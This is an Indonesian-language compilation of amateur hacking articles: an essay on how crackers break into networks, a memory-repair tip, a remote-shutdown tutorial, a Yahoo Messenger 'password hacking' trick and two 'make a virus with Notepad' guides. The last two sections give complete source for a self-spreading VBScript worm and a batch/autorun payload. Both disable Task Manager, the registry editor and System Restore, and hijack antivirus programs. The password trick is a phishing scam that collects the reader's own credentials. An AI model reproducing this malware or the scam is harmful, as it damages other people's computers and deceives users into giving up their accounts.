Belajar Menjadi Hacker

Hacker dengan keahliannya dapat melihat & memperbaiki kelemahan perangkat lunak di
komputer; biasanya kemudian di publikasikan secara terbuka di internet..
agar sistem menjadi lebih baik (tentu saja jika dia memang seorang Hacker sejati). Sialnya,
segelintir manusia berhati jahat menggunakan informasi tersebut untuk kejahatan - mereka
biasanya disebut cracker. Pada dasarnya dunia hacker & cracker tidak berbeda dengan dunia
seni, disini kita berbicara seni keamanan jaringan Internet.

Saya berharap ilmu keamanan jaringan di tulisan ini digunakan untuk hal-hal yang baik - jadilah
Hacker bukan Cracker. Jangan sampai anda terkena karma karena menggunakan ilmu untuk
merusak milik orang lain. Apalagi, pada saat ini kebutuhan akan hacker semakin bertambah di
Indonesia dengan semakin banyak dotcommers yang ingin IPO di berbagai bursa saham. Nama
baik & nilai sebuah dotcom bisa jatuh bahkan menjadi tidak berharga jika dotcom di bobol.
Dalam kondisi ini, para hacker di harapkan bisa menjadi konsultan keamanan bagi para
dotcommers tersebut - karena SDM pihak kepolisian & aparat keamanan Indonesia amat sangat
lemah & menyedihkan di bidang Teknologi Informasi & Internet. Apa boleh buat cybersquad,
cyberpatrol swasta barangkali perlu di budayakan untuk survival dotcommers Indonesia di
Internet.

Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain
di :
http://www.sans.org,
http://www.rootshell.com,
http://www.linuxfirewall.org/,
http://www.linuxdoc.org,
http://www.cerias.purdue.edu/coast/firewalls/,
http://www.redhat.com/mirrors/LDP/HOWTO/.
Sebagian dari teknik ini berupa buku-buku yang jumlah-nya beberapa ratus halaman yang dapat
di ambil secara cuma-cuma (gratis). Beberapa Frequently Asked Questions (FAQ) tentang
keamanan jaringan bisa diperoleh di :
http://www.iss.net/vd/mail.html,
http://www.v-one.com/documents/fw-faq.htm.
Dan bagi para experimenter beberapa script / program yang sudah jadi dapat diperoleh antara
lain di :
http://bastille-linux.sourceforge.net/,
http://www.redhat.com/support/docs/tips/firewall/firewallservice.html.

Bagi pembaca yang ingin memperoleh ilmu tentang jaringan dapat di download secara cuma-
cuma dari http://pandu.dhs.org,
http://www.bogor.net/idkf/,
http://louis.idaman.com/idkf.
Beberapa buku berbentuk softcopy yang dapat di ambil gratis dapat di ambil dari
http://pandu.dhs.org/Buku-Online/. Kita harus berterima kasih terutama kepada team Pandu yang
dimotori oleh I Made Wiryana untuk ini. Pada saat ini, saya tidak terlalu tahu adanya tempat
diskusi Indonesia yang aktif membahas teknik-teknik hacking ini - tetapi mungkin bisa sebagian
di diskusikan di mailing list lanjut seperti kursus-linux@yahoogroups.com & linux-
admin@linux.or.id yang di operasikan oleh Kelompok Pengguna Linux Indonesia (KPLI)
http://www.kpli.or.id.

Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi
dari berbagai vendor misalnya di http://www.sans.org/newlook/publications/roadmap.htm#3b
tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai
mailing list di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar
http://www.sans.org/newlook/publications/roadmap.htm#3e.
Dijelaskan oleh Front-line Information Security Team, "Techniques Adopted By 'System
Crackers' When Attempting To Break Into Corporate or Sensitive Private Networks,"
fist@ns2.co.uk http://www.ns2.co.uk. Seorang Cracker umumnya pria usia 16-25 tahun.
Berdasarkan statistik pengguna Internet di Indonesia maka sebetulnya mayoritas pengguna
Internet di Indonesia adalah anak-anak muda pada usia ini juga. Memang usia ini adalah usia
yang sangat ideal dalam menimba ilmu baru termasuk ilmu Internet, sangat disayangkan jika kita
tidak berhasil menginternetkan ke 25000 sekolah Indonesia s/d tahun 2002 - karena tumpuan hari
depan bangsa Indonesia berada di tangan anak-anak muda kita ini.

Nah, para cracker muda ini umumnya melakukan cracking untuk meningkatkan kemampuan /
menggunakan sumber daya di jaringan untuk kepentingan sendiri. Umumnya para cracker adalah
opportunis. Melihat kelemahan sistem dengan mejalankan program scanner. Setelah memperoleh
akses root, cracker akan menginstall pintu belakang (backdoor) dan menutup semua kelemahan
umum yang ada.

Seperti kita tahu, umumnya berbagai perusahaan / dotcommers akan menggunakan Internet
untuk (1) hosting web server mereka, (2) komunikasi e-mail dan (3) memberikan akses web /
internet kepada karyawan-nya. Pemisahan jaringan Internet dan IntraNet umumnya dilakukan
dengan menggunakan teknik / software Firewall dan Proxy server. Melihat kondisi penggunaan
di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver
external / luar yang digunakan untuk memudahkan akses ke mail keluar dari perusahaan. Selain
itu, dengan menggunakan agressive-SNMP scanner & program yang memaksa SNMP
community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian
dapat digunakan untuk batu loncatan untuk masuk ke dalam jaringan internal perusahaan
(IntraNet).

Agar cracker terlindungi pada saat melakukan serangan, teknik cloacking (penyamaran)
dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan)
melalui program telnet atau rsh. Pada mesin perantara yang menggunakan Windows serangan
dapat dilakukan dengan melompat dari program Wingate. Selain itu, melompat dapat dilakukan
melalui perangkat proxy yang konfigurasinya kurang baik.

Setelah berhasil melompat dan memasuki sistem lain, cracker biasanya melakukan probing
terhadap jaringan dan mengumpulkan informasi yang dibutuhkan. Hal ini dilakukan dengan
beberapa cara, misalnya :
(1) menggunakan nslookup untuk menjalankan perintah 'ls '.
(2) melihat file HTML di webserver anda untuk mengidentifikasi mesin lainnya.
(3) melihat berbagai dokumen di FTP server.
(4) menghubungkan diri ke mail server dan menggunakan perintah 'expn ', dan
(5) mem-finger user di mesin-mesin eksternal lainnya.

Langkah selanjutnya, cracker akan mengidentifikasi komponen jaringan yang dipercaya oleh
system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang
biasanya di anggap paling aman di jaringan. Start dengan check akses & eksport NFS ke
berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui
kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.

Selanjutnya cracker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan.
Cracker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner
kecil lainnya. Program seperti 'ps' & 'netstat' di buat trojan (ingat cerita kuda troya? dalam cerita
klasik yunani kuno) untuk menyembunyikan proses scanning. Bagi cracker yang cukup advanced
dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.
Setelah cracker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan,
maka cracker akan menjalan program untuk menaklukan program daemon yang lemah di server.
Program daemon adalah program di server yang biasanya berjalan di belakang layar (sebagai
daemon / setan). Keberhasilan menaklukan program daemon ini akan memungkinkan seorang
Cracker untuk memperoleh akses sebagai 'root' (administrator tertinggi di server).

Untuk menghilangkan jejak, seorang cracker biasanya melakukan operasi pembersihan 'clean-up'
operation dengan cara membersihkan berbagai log file. Dan menambahkan program untuk
masuk dari pintu belakang 'backdooring'. Mengganti file .rhosts di /usr/bin untuk memudahkan
akses ke mesin yang di taklukan melalui rsh & csh.

Selanjutnya seorang cracker dapat menggunakan mesin yang sudah ditaklukan untuk
kepentingannya sendiri, misalnya mengambil informasi sensitif yang seharusnya tidak
dibacanya; mengcracking mesin lain dengan melompat dari mesin yang di taklukan; memasang
sniffer untuk melihat / mencatat berbagai trafik / komunikasi yang lewat; bahkan bisa mematikan
sistem / jaringan dengan cara menjalankan perintah 'rm -rf / &'. Yang terakhir akan sangat fatal
akibatnya karena sistem akan hancur sama sekali, terutama jika semua software di letakan di
harddisk. Proses re-install seluruh sistem harus di lakukan, akan memusingkan jika hal ini
dilakukan di mesin-mesin yang menjalankan misi kritis.

Oleh karena itu semua mesin & router yang menjalankan misi kritis sebaiknya selalu di periksa
keamanannya & di patch oleh software yang lebih baru. Backup menjadi penting sekali terutama
pada mesin-mesin yang menjalankan misi kritis supaya terselamatkan dari ulah cracker yang
men-disable sistem dengan 'rm -rf / &'.
Bagi kita yang sehari-hari bergelut di Internet biasanya justru akan sangat menghargai
keberadaan para hacker (bukan Cracker). Karena berkat para hacker-lah Internet ada dan dapat
kita nikmati seperti sekarang ini, bahkan terus di perbaiki untuk menjadi sistem yang lebih baik
lagi. Berbagai kelemahan sistem di perbaiki karena kepandaian rekan-rekan hacker yang sering
kali mengerjakan perbaikan tsb. secara sukarela karena hobby-nya. Apalagi seringkali hasil
hacking-nya di sebarkan secara cuma-cuma di Internet untuk keperluan masyarakat Internet.
Sebuah nilai & budaya gotong royong yang mulia justru tumbuh di dunia maya Internet yang
biasanya terkesan futuristik dan jauh dari rasa sosial.

Pengembangan para hobbiest hacker ini menjadi penting sekali untuk keberlangsungan / survival
dotcommers di wahana Internet Indonesia. Sebagai salah satu bentuk nyatanya, dalam waktu
dekat Insya Allah sekitar pertengahan April 2001 akan di adakan hacking competition di Internet
untuk membobol sebuah server yang telah di tentukan terlebih dahulu. Hacking competition
tersebut di motori oleh anak-anak muda di Kelompok Pengguna Linux Indonesia (KPLI)
Semarang yang digerakan oleh anak muda seperti Kresno Aji (masaji@telkom.net), Agus
Hartanto (hartx@writeme.com) & Lekso Budi Handoko (handoko@riset.dinus.ac.id). Seperti
umumnya anak-anak muda lainnya, mereka umumnya bermodal cekak - bantuan & sponsor
tentunya akan sangat bermanfaat dan dinantikan oleh rekan-rekan muda ini.

Mudah-mudahan semua ini akan menambah semangat pembaca, khususnya pembaca muda,
untuk bergerak di dunia hacker yang mengasyikan dan menantang. Kalau kata Captain Jean Luc
Picard di Film Startrek Next Generation, "To boldly go where no one has gone before".

Apabila Anda ingin belajar menjadi hacker atau

cracker, cobalah buka situs di bawah ini. Namun gunakan dengan baik ya.

1. milw0rm.com
2. phrack.org
3. packetstromsecurity.com
4. securityfocus.com
 5. securititeam.com
6. astalavista.box.sk
7. kecoak.or.id
8. infosecurity.com
9. neotek.or.id
10. jasakom.com

Mungkin ada beberapa situs yang tidak bisa digunakan lagi. Soalnya saya juga belum cek
keseluruhannya.

Untuk “tools”-nya dapat dilihat di:

http://stefanbangun.wordpress.com/2008/11/01/10-tools-favorit-hacker-dan-pakar-
keamanan-komputer-thn-2006/

Namun apabila teman-teman punya referensi lain, boleh ditambahkan. Terima kasih

Cara Memperbaiki Memory Rusak

Alat Dan Bahan Yang Diperlukan

1. Memory rusak
2. 1 buah penghapus pensil
3. Tiner
4. AVO Meter

Langkah-langkah
1. Gosok-gosokan penghapus pensil tersebut pada bagian kaki memory sampai bersih
2. Lumuri kaki memory tersebut dengan tiner
3. Setel AVO pada skala hambatan (ohm) 1K, 10K, dan 100K
4. Kemudian tempelkan jarum negatif berwarna hitam pada salah satu kaki memory dan gosok-
gosokanlah jarum positif berwarna merah pada semua pin chipset memory (gambar yang
dilingkari merah adalah chipset Memory)
5. Setelah melakukan langkah-langkah di atas, Memorypun siap untuk dicoba
Memanfaatkan aliran arus listrik dari batere Avometer yang dialirkan ke dalam sirkuit-sirkuit
IC/Chipset memory . Cara kerja langkah sama halnya dengan proses Clear CMOS pada
Mainboard apabila Mainboard mengalami crash dan tidak mau hidup, dan terjadinya gangguan
atau penyumbatan pada perjalanan arus listrik sehingga arus yang di perlukan untuk untuk
pengaktifan suatu system yang tidak terpenuhi, atau seperti ilustrasi orang yang pingsan atau
koma lalu kita coba bangunkan dengan cara dipancing syaraf-syarafnya untuk aktif dan sadar
dengan cara disiram air, disetrum dsb.
 Cara Matikan KOMPUTER Jarak Jauh

Pendahuluan
Project yang kita buat adalah untuk mematikan komputer dari jarak jauh melalui remote ssh dan
telnet semua ini dilakukan didalam jaringan yang terkoneksi. Laporan ini tidak mengungkap
secara detail tentang dasar-dasar jaringan karena sudah pernah dibuat dan sudah banyak yang
membuatnya diharapkan para pembaca sudah menguasai teknik-teknik jaringan sederhana.
Konsep untuk mematikan komputer ini sangatlah sederhana hal-hal yang diperlukan hanyalah
dua buah komputer yang terkoneksi melalui jaringan LAN maupun internet dan mempunya IP
addressnya masing-masing. Selanjutnya masing-masing komputer diberikan service telnet
ataupun ssh sebagai server yang aktif.
Setelah terkoneksi untuk mematikan komputer pun tidak sulit karena hanya dibutuhkan beberapa
baris command yang mudah. Oleh karena itu marilah kita lihat lebih jauh lagi bagaimana cara
untuk mematikan komputer melalui service ssh maupun telnet.
A. System Requirements
1. Operating System yang mendukung networking. Dalam project ini kami menggunakan
Windows XP.
2. 2 network interface card.
3. Kabel LAN dengan jack RJ-45.
4. Menggunakan Peer to Peer connection.
B. Langkah-langkah mengaktifkan telnet server:
Pada dasarnya setiap windows XP sudah terdapat services telnet namun services ini tidak
diaktifkan.
1. Buka Control Panel, pilih Administration Tools, pilih Services.
2. Cari telnet services buka dengan klik dua kali.
3. Aktifkan telnet service pada modus automatic sehingga saat komputer direstart service ini pun
tetap aktif.
4. Karena kita tidak ingin melakukan restart lakukan pengaktifan telnet service dengan mengetik
start.
C. Langkah-langkah mengaktifkan ssh server:
Linux yang kita gunakan adalah versi debian ubuntu pada linux versi ini ssh-server tidak terdapat
dalam sistem, oleh karena itu dibutuhkan penginstallan aplikasi ini.
1. Pastikan komputer terkoneksi dengan internet.
2. sudo apt-get update (untuk mengupdate repisotory)
3. sudo apt-get install openssh-server.
D. Langkah-langkah mempersiapkan telnet client.
1. Untuk windows cukup mengaktifkan command prompt di dalam windows.
2. Untuk linux cukup mengaktikan terminal melalui start menu program.
E. Langkah-langkah mempersiapkan ssh client.
1. Untuk linux buka terminal melalui start menu program.
2. Untuk windows dapat menggunakan program tambahan semisal putty.
F. Mekanisme kerja:
Konsep yang perlu diperhatikan adalah:
1. SSH terdiri dari dua jenis yaitu ssh-server dan ssh-client.
2. Telnet terdiri dari dua jenis yaitu telnet-server dan telnet-client.
3. Ssh-server hanya dapat berjalan di pc berbasis linux.
4. Telnet-server hanya dapat berjalan di pc berbasis windows.
5. Basic command dari ssh mirip dengan basic comand di terminal linux.
6. Basic command dari telnet mirip dengan basic command di command prompt windows.
7. Ssh-client dapat berjalan di linux cukup dengan menggunakan terminal dari linux itu sendiri.
8. Ssh-client dapat berjalan di windows dengan menggunakan program tambahan putty.

9. Telnet-client dapat berjalan di linux cukup dengan menggunakan terminal dari linux itu
sendiri.
10. Telnet-client dapat berjalan di windows dengan menggunakan command prompt dari
windows itu sendiri.
G. Mematikan komputer melalui service ssh.
Pada konsepnya adalah sebagai berikut
Komputer 1 > Komputer 2
Ssh-client Ssh-server
Komputer 1 akan mencoba untuk mematikan komputer 2 oleh karena itu berikut beberapa
prinsip:
1. Ssh-client dapat berupa windows ataupun linux.
2. Ssh-server hanya dapat dijalankan di linux.
Step melalui terminal linux:
1. Buka terminal linux.
2. Ketikan ssh user_name@ip_address
3. Masukkan password
4. Ketikkan sudo shutdown –h now

Penjelasan:
1. user_name adalah user name yang dipakai di komputer linux yang akan dimatikan
2. ip_address adalah alamat ip yang dipakai di komputer linux yang akan dimatikan.
3. sudo menyatakan diri kita sebagai root atau administrator yang berhak.
4. –h menyatakan untuk mematikan keseluruhan sitem.
5. now menyatakan untuk mematikan pada saat command itu diexecute.

H. Mematikan komputer melalui service telnet.

Pada konsepnya adalah sebagai berikut.
Komputer 1 > Komputer 2
Telnet-client Telnet-server.
Komputer 1 akan mencoba untuk mematikan komputer oleh karena itu berikut beberapa prinsip:
1. Telnet-client dapat berupa windows ataupun linux.
2. Telnet-server hanya dapat dijalankan di windows.
3. Step melalui command prompt windows.
4. Buka terminal windows.
5. Ketikan telnet ip_address;
6. Masukkan password.
7. Ketikkan shutdown –s

Penjelasan:
1. user_name adalah user name yang di pakai di komputer 2 atau komputer windows yang akan
dimatikan.
2. Ip_address adalah alamat ip komputer yang akan dimatikan.
3. –s menyatakan untuk mematikan komputer sekarang juga.
BAB III - Penutup
Kesimpulan
1. Mematikan komputer melalui jarak jauh bukanlah hal yang sulit. Komputer yang akan
dimatikan dalam konsep ini haruslah berbasiskan ipaddress karena telnet dan ssh hanya akan
bekerja melalui ipaddress yang harus di set dimasing-masing komputer.
2. telnet melalui ssh melalui port masing-masing 23 dan 22.
3. Firewall dapat mematikan setiap destinasi port 23 dan 22 sehingga disarankan agar anda
mematikan semua firewall yang aktif.
4. Setiap komputer yang terkoneksikan kedalam jaringan internet dapat dimatikan melalui jarak
jauh dengan mengarahkan ssh dan telnet ke ip address yang di konfigurasikan dalam hal ini ip
address tersebut haruslah merupakan ip address public bukan ip address internal.
5. Koneksi melalui internet dapat membahayakan jaringan anda maka disarankan jangan
melalukan remote melalui jarak jauh apalagi melakukannya dengan telnet usahakanlah
melakukannya jarang mungkin dan bukan di komputer public. Jika anda akan sering
melakukannya anda dapat menggunakan jaringan yang bersifat private seperti VPN.
6. Tidak semua komputer yang memiliki ip_address public dapat dikoneksikan melalui telnet dan
ssh karena banyaknya router yang bersifat secure dengan tidak memperbolehkan koneksi dengan
port tertentu.
Saran
1. untuk menginstall aplikasi melalui apt-get yang terdapat dalam linux anda dapat menggunakan
repisotory local seperti vlsm.org lakukan customisasi melalui /etc/apt/sources.list
2. Linux ubuntu tidak dapat mendeteksi setiap hardware modem telephone oleh karena itu
disarankan untuk mengecek kompatibilitas melalui live cd terlebih dahulu.
3. Installasi linux dapat membuat windows anda hilang perhatikan baik-baik pilihan untuk
mencustomize partisi anda hindari pemformatan yang tidak perlu.

Hacking ID YM
Mungkin banyak yang penasaran bagaimana caranya mengetahui password YM (yahoo
messenger) seseorang. Ada banyak cara termasuk menggunakan software sejenis MPS. Tapi
kelemahannya, kalau PC target memiliki antispyware yg handal maka alamat Trojan yang
dikirim bakal terdeteksi.Ada salah satu cara yg bisa digunakan untuk membongkar password YM
seseorang tanpa musti repot-repot mempelajari software Trojan generatenya. Bahkan yang awam
sekalipun bisa melakukannya.

Berikut ini prosedurnya:

==================================
1. Kirim email ke secure_pwd@yahoo.com dengan “MemberPW” sebagai subjeknya
2. Ketik ID YM yang ingin dibobol passwordnya
3. Tekan enter sekali
4. ketik informasi account kamu
(alamat email):password
5. Kirim email
===================================

Format ini akan otomatis mengirim data ID YM target ke email yang telah kamu daftarkan.

Pesan yang telah kamu buat hasilnya akan seperti di bawah ini:
To: secure_pwd@yahoo.com
cc:
bcc:
Subject:MemberPW

akbar_mm_ti
evan_cess:muanisnya

Warning:
Bukan untuk disalahgunakan!!!tahan hawa nafsu untuk tidak merusak ID milik orang lain
MEMBUAT VIRUS DENGAN MEMAKAI NOTEPAD

1. Buka Notepad
2. Copy kan kode dibawah ini:

on error resume next

dim rekur,syspath,windowpath,desades,
longka,mf,isi,tf,F0nAb0530,nt,check,sd

isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe Mila.sys.vbs”

set longka = createobject(“Scripting.FileSystemObject”)

set mf = longka.getfile(Wscript.ScriptFullname)

dim text,size

size = mf.size

check = mf.drive.drivetype

set text = mf.openastextstream(1,-2)

do while not text.atendofstream

rekur = rekur & text.readline

rekur = rekur & vbcrlf

loop

do

Set windowpath = longka.getspecialfolder(0)

Set syspath = longka.getspecialfolder(1)

set tf = longka.getfile(syspath & “\recycle.vbs”)

tf.attributes = 32

set tf = longka.createtextfile(syspath & “\recycle.vbs”,2,true)

tf.write rekur

tf.close

set tf = longka.getfile(syspath & “\recycle.vbs”)

tf.attributes = 39

for each desades in longka.drives

If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path “A:” then

set tf=longka.getfile(desades.path &”\Mila.sys.vbs”)

tf.attributes =32

set tf=longka.createtextfile(desades.path &”\Mila.sys.vbs”,2,true)

tf.write rekur

tf.close

set tf=longka.getfile(desades.path &”\Mila.sys.vbs”)

tf.attributes = 39
set tf =longka.getfile(desades.path &”\autorun.inf”)

tf.attributes = 32

set tf=longka.createtextfile(desades.path &”\autorun.inf”,2,true)

tf.write isi

tf.close

set tf = longka.getfile(desades.path &”\autorun.inf”)

tf.attributes=39

end if

next

set F0nAb0530 = createobject(“WScript.Shell”)

F0nAb0530.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Main\Window Title”,”:: F0nA ::”

F0nAb0530.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Ad
vanced\Hidden”,2, “REG_DWORD”

F0nAb0530.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\No
Find”, “1″, “REG_DWORD”

F0nAb0530.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\No
FolderOptions”, “1″, “REG_DWORD”

F0nAb0530.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\No
Run”, “1″, “REG_DWORD”

F0nAb0530.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\Disa
bleRegistryTools”, “1″, “REG_DWORD”

F0nAb0530.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\Disa
bleTaskMgr”, “1″, “REG_DWORD”
F0nAb0530.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\No
ViewContextMenu”, “1″, “REG_DWORD”

F0nAb0530.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\No
TrayContextMenu”, “1″, “REG_DWORD”

F0nAb0530.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDeskt
op\NoChangingWallpaper”, “1″, “REG_DWORD”

F0nAb0530.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\No
WinKeys”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows
NT\SystemRestore\DisableSR”, “1″, “REG_DWORD”

F0nAb0530.RegWrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\
NoLogOff”, “1″, “REG_DWORD”

F0nAb0530.RegWrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\
NoControlPanel”, “1″, “REG_DWORD”

F0nAb0530.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a
”, “F0nAb0530-X2/1″

F0nAb0530.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\
MRUList”, “a”

F0nAb0530.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNo
ticeCaption”, “F0nAb0530-X2″

F0nAb0530.RegWrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNo
ticeText”, “Aku Sayang Mila”

F0nAb0530.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia”,
syspath & “\recycle.vbs”
F0nAb0530.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Main\Start Page”, “http://www.macancrew.net”

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\wordpad.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\VB6.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\autorun.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger”,”“

if check 1 then

Wscript.sleep 200000

end if

loop while check 1

set sd = createobject(“Wscript.shell”)

sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname

3. Simpan dengan nama Mila.sys.vbs

penulis: kartersekneg@yahoo.in

cara buat virus sederhana dari notepad bagian ke 2

ni virus efeknya g t’lalu bahaya….efek dari virus ini cuman mengganti tampilan dari

windows…..tapi cukup bikin kaget juga!!! tapi yg penting gak ke-detect ama anti

virus(setahu saya….. )

ni ane dapet dari hasil baca-baca “HELP”-nya windows Xp…trus ane modif sendiri… 8)

note: “HANYA BEKERJA PADA WINDOWS XP”

caranya:

- buka notepad lalu tulis(atau copy paste…tapi di edit dulu yaaa… ) script di bawah ini:

@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive
%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive
%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi
lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi
lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi
lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM
LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER
AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive
%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive
%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v
nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat
dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau
kombinasi warna RGB lain,cari pake Adobe Photoshop) /f

- lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)

- buat Autorun.inf dengan script:

[autorun]
open=nama_file.bat

- lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)

- file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri
tanda check pada HIDDEN dan READ-ONLY
- copy file-file tsb ke CD
- nikmati efeknya

note:
- jangan disalahgunakan
- maaf kalau pernah diposting

- maaf lagi kalau salah tempat untuk posting,….maklum member baru and masih amatir ….

- lagi-lagi maaf kalau ada yang salah, and mohon dikoreksi ….

- kalau mau buat anti virusnya tinggal di modifikasi nilainya….
SALAM DAMAI UNTUK SEMUA TEMEN-TEMEN HACKER DI INDONESIA